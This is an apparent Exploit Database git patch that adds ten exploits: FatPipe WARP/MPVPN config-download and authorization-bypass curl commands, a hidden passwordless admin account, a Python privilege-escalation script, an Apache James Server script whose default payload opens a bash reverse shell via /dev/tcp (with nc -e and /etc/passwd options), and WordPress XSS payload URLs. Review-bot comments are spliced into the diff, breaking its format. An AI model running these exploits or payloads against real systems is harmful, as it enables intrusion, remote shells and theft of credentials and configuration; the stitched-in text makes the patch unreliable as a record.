From d2b0bf596b52b207a3c48d9375e20b9b9e465556 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 29 Sep 2021 05:02:13 +0000 Subject: [PATCH] DB: 2021-09-29 10 changes to exploits/shellcodes Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) FatPipe Networks WARP 10.2.2 - Authorization Bypass FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated) WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS) --- exploits/hardware/webapps/50338.txt | 108 ++++++++++++++++ exploits/hardware/webapps/50339.txt | 81 ++++++++++++ exploits/hardware/webapps/50340.txt | 182 ++++++++++++++++++++++++++ exploits/hardware/webapps/50341.txt | 118 +++++++++++++++++ exploits/hardware/webapps/50342.py | 191 ++++++++++++++++++++++++++++ exploits/linux/remote/50347.py | 103 +++++++++++++++ exploits/php/webapps/50343.txt | 21 +++ exploits/php/webapps/50344.txt | 13 ++ exploits/php/webapps/50345.txt | 13 ++ exploits/php/webapps/50346.txt | 13 ++ files_exploits.csv | 10 ++ 11 files changed, 853 insertions(+) create mode 100644 exploits/hardware/webapps/50338.txt create mode 100644 exploits/hardware/webapps/50339.txt create mode 100644 exploits/hardware/webapps/50340.txt create mode 100644 exploits/hardware/webapps/50341.txt create mode 100755 exploits/hardware/webapps/50342.py create mode 100755 exploits/linux/remote/50347.py create mode 100644 exploits/php/webapps/50343.txt create mode 100644 exploits/php/webapps/50344.txt create mode 100644 exploits/php/webapps/50345.txt create mode 100644 
exploits/php/webapps/50346.txt diff --git a/exploits/hardware/webapps/50338.txt b/exploits/hardware/webapps/50338.txt new file mode 100644 index 000000000..528d7d010 --- /dev/null +++ b/exploits/hardware/webapps/50338.txt @@ -0,0 +1,108 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + + + + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/50339.txt b/exploits/hardware/webapps/50339.txt new file mode 100644 index 000000000..21ea88241 --- /dev/null +++ b/exploits/hardware/webapps/50339.txt 
@@ -0,0 +1,81 @@ +# Exploit Title: FatPipe Networks WARP 10.2.2 - Authorization Bypass +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +FatPipe Networks WARP 10.2.2 Authorization Bypass + + +Vendor: FatPipe Networks Inc. +Product web page: https://www.fatpipeinc.com +Affected version: WARP + 10.2.2r38 + 10.2.2r25 + 10.2.2r10 + 10.1.2r60p82 + 10.1.2r60p71 + 10.1.2r60p65 + 10.1.2r60p58s1 + 10.1.2r60p58 + 10.1.2r60p55 + 10.1.2r60p45 + 10.1.2r60p35 + 10.1.2r60p32 + 10.1.2r60p13 + 10.1.2r60p10 + 9.1.2r185 + 9.1.2r180p2 + 9.1.2r165 + 9.1.2r164p5 + 9.1.2r164p4 + 9.1.2r164 + 9.1.2r161p26 + 9.1.2r161p20 + 9.1.2r161p17 + 9.1.2r161p16 + 9.1.2r161p12 + 9.1.2r161p3 + 9.1.2r161p2 + 9.1.2r156 + 9.1.2r150 + 9.1.2r144 + 9.1.2r129 + 7.1.2r39 + 6.1.2r70p75-m + 6.1.2r70p45-m + 6.1.2r70p26 + 5.2.0r34 + +Summary: FatPipe Networks invented the concept of router-clustering, +which provides the highest level of reliability, redundancy, and speed +of Internet traffic for Business Continuity and communications. FatPipe +WARP achieves fault tolerance for companies by creating an easy method +of combining two or more Internet connections of any kind over multiple +ISPs. FatPipe utilizes all paths when the lines are up and running, +dynamically balancing traffic over the multiple lines, and intelligently +failing over inbound and outbound IP traffic when ISP services and/or +components fail. + +Desc: Improper access control occurs when the application provides direct +access to objects based on user-supplied input. As a result of this vulnerability +attackers can bypass authorization and access resources behind protected +pages. 
+ +Tested on: Apache-Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5682 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php + + +30.05.2016 +25.07.2021 + +-- + + +$ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp" \ No newline at end of file diff --git a/exploits/hardware/webapps/50340.txt b/exploits/hardware/webapps/50340.txt new file mode 100644 index 000000000..2abe48519 --- /dev/null +++ b/exploits/hardware/webapps/50340.txt 
@@ -0,0 +1,182 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download + + +Vendor: FatPipe Networks Inc. +Product web page: https://www.fatpipeinc.com +Affected version: WARP / IPVPN / MPVPN + 10.2.2r38 + 10.2.2r25 + 10.2.2r10 + 10.1.2r60p82 + 10.1.2r60p71 + 10.1.2r60p65 + 10.1.2r60p58s1 + 10.1.2r60p58 + 10.1.2r60p55 + 10.1.2r60p45 + 10.1.2r60p35 + 10.1.2r60p32 + 10.1.2r60p13 + 10.1.2r60p10 + 9.1.2r185 + 9.1.2r180p2 + 9.1.2r165 + 9.1.2r164p5 + 9.1.2r164p4 + 9.1.2r164 + 9.1.2r161p26 + 9.1.2r161p20 + 9.1.2r161p17 + 9.1.2r161p16 + 9.1.2r161p12 + 9.1.2r161p3 + 9.1.2r161p2 + 9.1.2r156 + 9.1.2r150 + 9.1.2r144 + 9.1.2r129 + 7.1.2r39 + 6.1.2r70p75-m + 6.1.2r70p45-m + 6.1.2r70p26 + 5.2.0r34 + +Summary: FatPipe Networks invented the concept of router-clustering, +which provides the highest level of reliability, redundancy, and speed +of Internet traffic for Business Continuity and communications. FatPipe +WARP achieves fault tolerance for companies by creating an easy method +of combining two or more Internet connections of any kind over multiple +ISPs. FatPipe utilizes all paths when the lines are up and running, +dynamically balancing traffic over the multiple lines, and intelligently +failing over inbound and outbound IP traffic when ISP services and/or +components fail. + +FatPipe IPVPN balances load and provides reliability among multiple +managed and CPE based VPNs as well as dedicated private networks. FatPipe +IPVPN can also provide you an easy low-cost migration path from private +line, Frame or Point-to-Point networks. You can aggregate multiple private, +MPLS and public networks without additional equipment at the provider's +site. 
+ +FatPipe MPVPN, a patented router clustering device, is an essential part +of Disaster Recovery and Business Continuity Planning for Virtual Private +Network (VPN) connectivity. It makes any VPN up to 900% more secure and +300% times more reliable, redundant and faster. MPVPN can take WANs with +an uptime of 99.5% or less and make them 99.999988% or higher, providing +a virtually infallible WAN. MPVPN dynamically balances load over multiple +lines and ISPs without the need for BGP programming. MPVPN aggregates up +to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +you need to keep your VPN up and running despite failures of service, line, +software, or hardware. + +Desc: The application is vulnerable to unauthenticated configuration disclosure +when direct object reference is made to the backup archive file using an HTTP +GET request. The only unknown part of the filename is the hostname of the system. +This will enable the attacker to disclose sensitive information and help her +in authentication bypass, privilege escalation and full system access. + +Tested on: Apache-Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5683 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php + + +30.05.2016 +25.07.2021 + +-- + + +Products: +--------- +WARP / MPVPN / IPVPN + +Format: +------- +https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz + +Examples: +--------- +curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz # For WARP +curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz # For MPVPN/IPVPN + +Version: +-------- +$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2" +103:
10.2.2r38
+ +Product: +-------- +$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe" +15: FatPipe MPVPN | Log in + +Content: +-------- +$ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz +$ cd etc +$ cat Xpasswd +Administrator:26df420bcb78bb02eef532d51aea22e2:1 +fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1 + +$ ls +. +.. +auto_config.conf +bird.conf +bridge.conf +cm.conf +crontab +dhcpd.conf +dnssec.conf +dynamic_route.conf +fatpipe +fileserver.conf +fp_arp.conf +fp_config.dtd +fp_distributed_global_rule +fp_global_rule +fp_version +haproxy +hosts +interface_access_list.conf +ipsec.conf +ipsec.d +ipsec.secrets +ipsec_cert_secrets +ipsec_shared_secrets +ipsec_subnet.conf +ipsec_xauth.conf +ipv4_dynamic_routing.conf +logrotate.d +manifest +named.conf +network_object.conf +ntp.conf +ppp +radiusclient +resolv.conf +rsyslog.conf +site.xml +site.xml.org +snmp_config.conf +squid +sysconfig +syslog.conf +tcp-congestion-table.conf +tcp-congestion-table.conf.org +webfilter.conf +xgreet.txt +xnetmap.conf +Xpasswd +xsnmp.conf +xtreme_conf.xml \ No newline at end of file diff --git a/exploits/hardware/webapps/50341.txt b/exploits/hardware/webapps/50341.txt new file mode 100644 index 000000000..912ef064d --- /dev/null +++ b/exploits/hardware/webapps/50341.txt 
@@ -0,0 +1,118 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access) + + +Vendor: FatPipe Networks Inc. +Product web page: https://www.fatpipeinc.com +Affected version: WARP / IPVPN / MPVPN + 10.2.2r38 + 10.2.2r25 + 10.2.2r10 + 10.1.2r60p82 + 10.1.2r60p71 + 10.1.2r60p65 + 10.1.2r60p58s1 + 10.1.2r60p58 + 10.1.2r60p55 + 10.1.2r60p45 + 10.1.2r60p35 + 10.1.2r60p32 + 10.1.2r60p13 + 10.1.2r60p10 + 9.1.2r185 + 9.1.2r180p2 + 9.1.2r165 + 9.1.2r164p5 + 9.1.2r164p4 + 9.1.2r164 + 9.1.2r161p26 + 9.1.2r161p20 + 9.1.2r161p17 + 9.1.2r161p16 + 9.1.2r161p12 + 9.1.2r161p3 + 9.1.2r161p2 + 9.1.2r156 + 9.1.2r150 + 9.1.2r144 + 9.1.2r129 + 7.1.2r39 + 6.1.2r70p75-m + 6.1.2r70p45-m + 6.1.2r70p26 + 5.2.0r34 + +Summary: FatPipe Networks invented the concept of router-clustering, +which provides the highest level of reliability, redundancy, and speed +of Internet traffic for Business Continuity and communications. FatPipe +WARP achieves fault tolerance for companies by creating an easy method +of combining two or more Internet connections of any kind over multiple +ISPs. FatPipe utilizes all paths when the lines are up and running, +dynamically balancing traffic over the multiple lines, and intelligently +failing over inbound and outbound IP traffic when ISP services and/or +components fail. + +FatPipe IPVPN balances load and provides reliability among multiple +managed and CPE based VPNs as well as dedicated private networks. FatPipe +IPVPN can also provide you an easy low-cost migration path from private +line, Frame or Point-to-Point networks. You can aggregate multiple private, +MPLS and public networks without additional equipment at the provider's +site. 
+ +FatPipe MPVPN, a patented router clustering device, is an essential part +of Disaster Recovery and Business Continuity Planning for Virtual Private +Network (VPN) connectivity. It makes any VPN up to 900% more secure and +300% times more reliable, redundant and faster. MPVPN can take WANs with +an uptime of 99.5% or less and make them 99.999988% or higher, providing +a virtually infallible WAN. MPVPN dynamically balances load over multiple +lines and ISPs without the need for BGP programming. MPVPN aggregates up +to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +you need to keep your VPN up and running despite failures of service, line, +software, or hardware. + +Desc: The application has a hidden administrative account 'cmuser' that has +no password and has write access permissions to the device. The user cmuser +is not visible in Users menu list of the application. + +Tested on: Apache-Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5684 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php + + +30.05.2016 +25.07.2021 + +-- + + +Overview: +FatPipe Central Manager is a secure web based solution providing a centralized solution +to manage FatPipe's suite of WAN reliability and optimization products. Central Manager +allows you to configure, manage and monitor FatPipe's patented MPSec technology at the +click of a button. + +Central Manager = cmuser. +Once authenticated, you get admin rights. + +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +Strict-Transport-Security: max-age=31536000 +X-Frame-Options: DENY +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +Content-Type: application/json;charset=ISO-8859-1 +Content-Length: 118 +Date: Fri, 06 Aug 2017 16:37:07 GMT +Connection: close + +{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"} \ No newline at end of file 
diff --git a/exploits/hardware/webapps/50342.py b/exploits/hardware/webapps/50342.py new file mode 100755 index 000000000..0e82e9247 --- /dev/null +++ b/exploits/hardware/webapps/50342.py 
@@ -0,0 +1,191 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +#!/usr/bin/env python3 +# +# +# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation +# +# +# Vendor: FatPipe Networks Inc. +# Product web page: https://www.fatpipeinc.com +# Affected version: WARP / IPVPN / MPVPN +# 10.2.2r38 +# 10.2.2r25 +# 10.2.2r10 +# 10.1.2r60p82 +# 10.1.2r60p71 +# 10.1.2r60p65 +# 10.1.2r60p58s1 +# 10.1.2r60p58 +# 10.1.2r60p55 +# 10.1.2r60p45 +# 10.1.2r60p35 +# 10.1.2r60p32 +# 10.1.2r60p13 +# 10.1.2r60p10 +# 9.1.2r185 +# 9.1.2r180p2 +# 9.1.2r165 +# 9.1.2r164p5 +# 9.1.2r164p4 +# 9.1.2r164 +# 9.1.2r161p26 +# 9.1.2r161p20 +# 9.1.2r161p17 +# 9.1.2r161p16 +# 9.1.2r161p12 +# 9.1.2r161p3 +# 9.1.2r161p2 +# 9.1.2r156 +# 9.1.2r150 +# 9.1.2r144 +# 9.1.2r129 +# 7.1.2r39 +# 6.1.2r70p75-m +# 6.1.2r70p45-m +# 6.1.2r70p26 +# 5.2.0r34 +# +# Summary: FatPipe Networks invented the concept of router-clustering, +# which provides the highest level of reliability, redundancy, and speed +# of Internet traffic for Business Continuity and communications. FatPipe +# WARP achieves fault tolerance for companies by creating an easy method +# of combining two or more Internet connections of any kind over multiple +# ISPs. FatPipe utilizes all paths when the lines are up and running, +# dynamically balancing traffic over the multiple lines, and intelligently +# failing over inbound and outbound IP traffic when ISP services and/or +# components fail. +# +# FatPipe IPVPN balances load and provides reliability among multiple +# managed and CPE based VPNs as well as dedicated private networks. FatPipe +# IPVPN can also provide you an easy low-cost migration path from private +# line, Frame or Point-to-Point networks. You can aggregate multiple private, +# MPLS and public networks without additional equipment at the provider's +# site. 
+# +# FatPipe MPVPN, a patented router clustering device, is an essential part +# of Disaster Recovery and Business Continuity Planning for Virtual Private +# Network (VPN) connectivity. It makes any VPN up to 900% more secure and +# 300% times more reliable, redundant and faster. MPVPN can take WANs with +# an uptime of 99.5% or less and make them 99.999988% or higher, providing +# a virtually infallible WAN. MPVPN dynamically balances load over multiple +# lines and ISPs without the need for BGP programming. MPVPN aggregates up +# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +# you need to keep your VPN up and running despite failures of service, line, +# software, or hardware. +# +# Desc: The application suffers from a privilege escalation vulnerability. +# A normal user (group USER, 0) can elevate her privileges by sending a HTTP +# POST request and setting the JSON parameter 'privilege' to integer value +# '1' gaining administrative rights (group ADMINISTRATOR, 1). 
+# +# Tested on: Apache-Coyote/1.1 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2021-5685 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php +# +# +# 30.05.2016 +# 25.07.2021 +# +# + +import sys +import time####### +import requests################ +requests.packages.urllib3.disable_warnings() + +if len(sys.argv) !=2: + print + print("********************************************************") + print("* *") + print("* Privilege escalation from USER to ADMINISTRATOR role *") + print("* in *") + print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *") + print("* *") + print("* ZSL-2021-5685 *") + print("* *") + print("********************************************************") + print("\n[POR] Usage: ./escalator.py [IP]") + sys.exit() + +ajpi=sys.argv[1] +print +juzer=raw_input("[UNE] Username: ") +pasvord=raw_input("[UNE] Password: ") + +sesija=requests.session() +logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'} + +hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"', + 'Accept' :'application/json, text/javascript, */*; q=0.01', + 'X-Requested-With':'XMLHttpRequest', + 'Sec-Ch-Ua-Mobile':'?0', + 'User-Agent' :'Fatnet/1.b', + 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8', + 'Origin' :'https://'+ajpi, + 'Sec-Fetch-Site' :'same-origin', + 'Sec-Fetch-Mode' :'cors', + 'Sec-Fetch-Dest' :'empty', + 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet', + 'Accept-Encoding' :'gzip, deflate', + 'Accept-Language' :'en-US,en;q=0.9', + 'Connection' :'close'} + +juarel1='https://'+ajpi+'/fpui/loginServlet' +alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False) + +if not 'success' in alo.text: + print('[GRE] Login error.') + sys.exit() +else: + print('[POR] Authentication successful.') + +print('[POR] Climbing the ladder...') + +sluba=''' +|| || .--._ +||====|| __ '---._) +|| ||"")\ Q Q ) +||====|| 
=_/ o / +|| || | \_.-;-'-,._ +||====|| | ' o---o ) +|| || \ /H __H\ / +||====|| '-' \"")\/ | +|| || _ |_='-)_/ +||====|| / '. ) +|| || / / +||====|| |___/\| / +|| || |_| | | +||====|| / ) \\ \\ +|| || (__/ \___\\ +||====|| \_\\ +|| || / ) +||====|| (__/ +''' + +for k in sluba: + sys.stdout.write(k) + sys.stdout.flush() + time.sleep(0.01) + +juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest' +posta={ +'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' +} +stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False) + +if not 'true' in stanje.text: + print('\n[GRE] Something\'s fishy!') + sys.exit() +else: + print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.') + sys.exit() \ No newline at end of file diff --git a/exploits/linux/remote/50347.py b/exploits/linux/remote/50347.py new file mode 100755 index 000000000..ebaae986d --- /dev/null +++ b/exploits/linux/remote/50347.py 
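Review bot: The script's header line `#!/usr/bin/env python3` does not match its body: `juzer=raw_input("[UNE] Username: ")` and `pasvord=raw_input("[UNE] Password: ")` use a name that exists only in Python 2, so under the declared interpreter the script stops with a NameError right after printing the banner; the shebang and the input calls should agree on one Python version. The lines `import time#######` and `import requests################` carry stray comment markers that look like editing leftovers and should be cleaned up. Both `sesija.post(...)` calls pass `verify=False`, which disables TLS certificate validation at the moment the user's credentials are submitted; that choice deserves an explicit comment, e.g. `# verify=False disables certificate validation: the credentials entered above can be intercepted on an untrusted network path`.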
@@ -0,0 +1,103 @@ +# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) +# Date: 27/09/2021 +# Exploit Author: shinris3n +# Vendor Homepage: http://james.apache.org/server/ +# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip +# Version: Apache James Server 2.3.2 +# Tested on: Ubuntu +# Info: This exploit works on default installation of Apache James Server 2.3.2 +# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d + +''' +This Python 3 implementation is based on the original (Python 2) exploit code developed by +Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec. The following modifications were made: + +1 - Made required changes to print and socket commands for Python 3 compatibility. +1 - Changed the default payload to a basic bash reverse shell script and added a netcat option. +2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2. +3 - Added a payload that can be used for testing remote command execution and connectivity. +4 - Added payload and listener information output based on payload selection and user input. +5 - Added execution output clarifications and additional informational comments throughout the code. 
+ +@shinris3n +https://twitter.com/shinris3n +https://shinris3n.github.io/ +''' + +#!/usr/bin/python3 + +import socket +import sys +import time + +# credentials to James Remote Administration Tool (Default - root/root) +user = 'root' +pwd = 'root' + +if len(sys.argv) != 4: + sys.stderr.write("[-]Usage: python3 %s \n" % sys.argv[0]) + sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0]) + sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n") + sys.exit(1) + +remote_ip = sys.argv[1] +local_ip = sys.argv[2] +port = sys.argv[3] + +# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH) +payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login +#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell +#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity +#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only + +print ("[+]Payload Selected (see script for more options): ", payload) +if '/bin/bash' in payload: + print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port) + + +def recv(s): + s.recv(1024) + time.sleep(0.2) + +try: + print ("[+]Connecting to James Remote Administration Tool...") + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary. 
+ s.recv(1024) + s.send((user + "\n").encode('utf-8')) + s.recv(1024) + s.send((pwd + "\n").encode('utf-8')) + s.recv(1024) + print ("[+]Creating user...") + s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8')) + s.recv(1024) + s.send("quit\n".encode('utf-8')) + s.close() + + print ("[+]Connecting to James SMTP server...") + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary. + s.send("ehlo team@team.pl\r\n".encode('utf-8')) + recv(s) + print ("[+]Sending payload...") + s.send("mail from: <'@team.pl>\r\n".encode('utf-8')) + recv(s) + # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found + s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8')) + recv(s) + s.send("data\r\n".encode('utf-8')) + recv(s) + s.send("From: team@team.pl\r\n".encode('utf-8')) + s.send("\r\n".encode('utf-8')) + s.send("'\n".encode('utf-8')) + s.send((payload + "\n").encode('utf-8')) + s.send("\r\n.\r\n".encode('utf-8')) + recv(s) + s.send("quit\r\n".encode('utf-8')) + recv(s) + s.close() + print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).") + if '/bin/bash' in payload: + print ("[+]Don't forget to start a listener on port", port, "before logging in!") +except: + print ("Connection failed.") \ No newline at end of file diff --git a/exploits/php/webapps/50343.txt b/exploits/php/webapps/50343.txt new file mode 100644 index 000000000..e0d5522bc --- /dev/null +++ b/exploits/php/webapps/50343.txt 
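Review bot: The `try` block at the end of the hunk closes with a bare `except:` that prints "Connection failed." for every failure, so a rejected login, a socket timeout, a KeyboardInterrupt and a plain coding error all surface with the same misleading message and the real exception is discarded; narrowing it to `except OSError as e:` followed by `print("Connection failed:", e)` keeps the message honest and lets Ctrl-C propagate. The `#!/usr/bin/python3` line is placed after the module docstring, so it is a comment rather than a shebang even though the file is created with mode 100755 — either move it to line 1 or drop the executable bit. The closing `print ("[+]Done! ...")` runs whenever no exception was raised, while `recv(s)` throws away every server reply unread, so the success message should be documented as "no exception occurred" rather than "the server accepted the message".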
@@ -0,0 +1,21 @@
+# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 06-08-2021
+# Exploit Author: Nosa Shandy (Apapedulimu)
+# Vendor Homepage: https://translatepress.com/
+# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
+# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f
+# Version: 2.0.6
+# Tested on: macOS 11.4
+# CVE : CVE-2021-24610
+
+Description:
+The plugin does not implement a proper filter on the 'translated' parameter when input to the database. The 'trp_sanitize_string' function only check the "" with the preg_replace, the attacker can use the HTML Tag to execute javascript.
+
+Step To Reproduce:
+1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true
+2. Input Gettext String
+3. Input the payload such as
+4. Save, The payload will be executed.
+5. Look on the homepage will be affected.
+
+Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing
\ No newline at end of file
diff --git a/exploits/php/webapps/50344.txt b/exploits/php/webapps/50344.txt
new file mode 100644
index 000000000..491c6280d
--- /dev/null
+++ b/exploits/php/webapps/50344.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
+# Date: 3/28/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
+# Version: 1.7.14
+# Tested on: Windows 10
+# CVE: CVE-2021-24276
+
+1. Description:
+The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+
+2. Proof of Concept:
+/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
\ No newline at end of file
diff --git a/exploits/php/webapps/50345.txt b/exploits/php/webapps/50345.txt
new file mode 100644
index 000000000..3fb42cad2
--- /dev/null
+++ b/exploits/php/webapps/50345.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
+# Date: 3/28/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
+# Version: 1.2.4
+# Tested on: Windows 10
+# CVE: CVE-2021-24274
+
+1. Description:
+The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+
+2. Proof of Concept:
+/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
\ No newline at end of file
diff --git a/exploits/php/webapps/50346.txt b/exploits/php/webapps/50346.txt
new file mode 100644
index 000000000..9aa1ba1e2
--- /dev/null
+++ b/exploits/php/webapps/50346.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
+# Date: 3/28/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
+# Version: 1.10.4
+# Tested on: Windows 10
+# CVE: CVE-2021-24275
+
+1. Description:
+The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+
+2. Proof of Concept:
+/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ad8c32547..1495e51f5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18539,6 +18539,7 @@ id,file,description,date,author,type,platform,port
 50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux,
 50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware,
 50335,exploits/hardware/remote/50335.py,"Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers",1970-01-01,"Michael Alamoot",remote,hardware,
+50347,exploits/linux/remote/50347.py,"Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)",1970-01-01,shinris3n,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44453,3 +44454,12 @@ id,file,description,date,author,type,platform,port
